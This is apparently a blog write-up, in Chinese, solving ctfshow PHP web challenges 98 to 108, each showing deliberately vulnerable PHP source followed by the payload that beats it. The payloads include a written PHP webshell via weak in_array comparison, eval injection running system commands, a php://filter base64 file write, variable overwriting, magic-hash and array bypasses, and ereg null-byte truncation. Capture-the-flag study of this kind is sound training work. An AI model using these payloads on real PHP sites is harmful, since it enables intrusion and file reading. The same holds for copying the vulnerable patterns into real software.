ctfshow-web入门-PHP特性-98-108


web98

Notice: Undefined index: flag in /var/www/html/index.php on line 15

Notice: Undefined index: flag in /var/www/html/index.php on line 16

Notice: Undefined index: HTTP_FLAG in /var/www/html/index.php on line 17
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com

*/

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

第一句的意思是如果传入了get参数,就让get的参数等于post参数。

if($ _GET) =>$ _GET= $ _POST;

第二句话如果$ _GET[‘flag’] == flag,那么就让get == cookie 。

第三句同理。

第一句是肯定要满足,满足了以后可以让第二第三句不满足,直接传post,所以payloadget:?a=a post:HTTP_FLAG=flag

第二种解法,第一句第二句满足,第三句不满足payloadget:?a=a post:flag=flag cookie:HTTP_FLAG=flag

web99

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

i从36到0x36d,每次都会选择一个1到i的数随机写入allow数组。所以allow共有841个元素,元素范围是从0-877。

然后get传入n,判断是否在allow中,如果在,就把post传入的content传入n这个文件。因为in_array没有第三个参数,所以是弱比较。即1.php也会被判定为1。所以payloadget:?n=1.php post:content=<?php eval($_POST[1]); ?>

然后访问1.php,传入参数即可

web100

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}


?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 17

Notice: Undefined index: v2 in /var/www/html/index.php on line 18

Notice: Undefined index: v3 in /var/www/html/index.php on line 19

因为php中赋值的优先级比运算符要高,所以只要保证v1是数字即可

payloadget:?v1=1&v2=eval($_POST[1])?>&v3=; post:1=system('tac flag36d.php');

但是我们发现这并不是真正的flag,于是我们查看ctfshow.php,找到了flag_is_8076fcaf0x2d27790x2d49030x2d95e60x2d5f142389996f,我们把0x等url解码后就是我们的flag,记得加上ctfshow{}

web101

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-22 00:26:48
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 17

Notice: Undefined index: v2 in /var/www/html/index.php on line 18

Notice: Undefined index: v3 in /var/www/html/index.php on line 19

禁用了很多特殊字符,我们可以使用反射类来查看

payload?v1=1&v2=echo new Reflectionclass&v3=;我们看到flag最后一位是一个空格,我们爆破最后一位即可

web102

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 20:59:43

*/


highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}


?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 14

Notice: Undefined index: v2 in /var/www/html/index.php on line 15

Notice: Undefined index: v3 in /var/www/html/index.php on line 16
hacker

这题就是很巧妙的配凑,直接上payloadGET:v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=2.php POST:v1=hex2bin

web103

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 21:03:24

*/


highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);
    }
    else{
        die('Sorry');
    }
}
else{
    die('hacker');
}

?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 14

Notice: Undefined index: v2 in /var/www/html/index.php on line 15

Notice: Undefined index: v3 in /var/www/html/index.php on line 16
hacker

同web102

web104

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:27:20

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}



?>

因为没有判断,所以直接输入的值v1=v2即可。

第二种可以用数组绕过

第三种可以使用sha1开头为0e的绕过

web105

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>
你还想要flag嘛?

考察:php的变量覆盖。第一步,先把flag的值赋值给suces。第二部,再把suces的值赋值给error,最后打印error的值。

payloadGET: ?suces=flag POST: error=suces

web106

<?php/*# -*- coding: utf-8 -*-# @Author: atao# @Date:   2020-09-16 11:25:09# @Last Modified by:   h1xa# @Last Modified time: 2020-09-28 22:38:27*/highlight_file(__FILE__);include("flag.php");if(isset($_POST['v1']) && isset($_GET['v2'])){    $v1 = $_POST['v1'];    $v2 = $_GET['v2'];    if(sha1($v1)==sha1($v2) && $v1!=$v2){        echo $flag;    }}?>

使用数组或者构建开头为oe的sha1加密

常见的开头为0e的

QNKCDZO 0e830400451993494058024219903391240610708 0e462097431906509019562988736854aabg7XSs 0e087386482136013740957780965295aabC9RqS 0e041022518165728065344349536299s878926199a 0e545993274517709034328855841020s155964671a 0e342768416822451524974117254469s214587387a 0e848240448830537924465865611904s214587387a 0e848240448830537924465865611904s878926199a 0e545993274517709034328855841020s1091221200a 0e940624217856561557816327384675s1885207154a 0e509367213418206700842008763514

payloadget:?v1[]=1 post:v2[]=2

web107

<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date:   2020-09-16 11:25:09# @Last Modified by:   h1xa# @Last Modified time: 2020-09-28 23:24:14*/highlight_file(__FILE__);error_reporting(0);include("flag.php");if(isset($_POST['v1'])){    $v1 = $_POST['v1'];    $v3 = $_GET['v3'];       parse_str($v1,$v2);       if($v2['flag']==md5($v3)){           echo $flag;       }}?>

官方解 GET: ?v3=240610708 POST: v1=flag=0

或者可以让md5($v3)=null,让$v2[‘flag’]也等于null。payloadget:?v3[]=1 post:v1=

web108

<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date:   2020-09-16 11:25:09# @Last Modified by:   h1xa# @Last Modified time: 2020-09-28 23:53:55*/highlight_file(__FILE__);error_reporting(0);include("flag.php");if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {    die('error');}//只有36d的人才能看到flagif(intval(strrev($_GET['c']))==0x36d){    echo $flag;}?>error

ereg有一个漏洞,当他读到截断符也就是%00时会停止读取,所以利用漏洞payload?c=a%00778


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录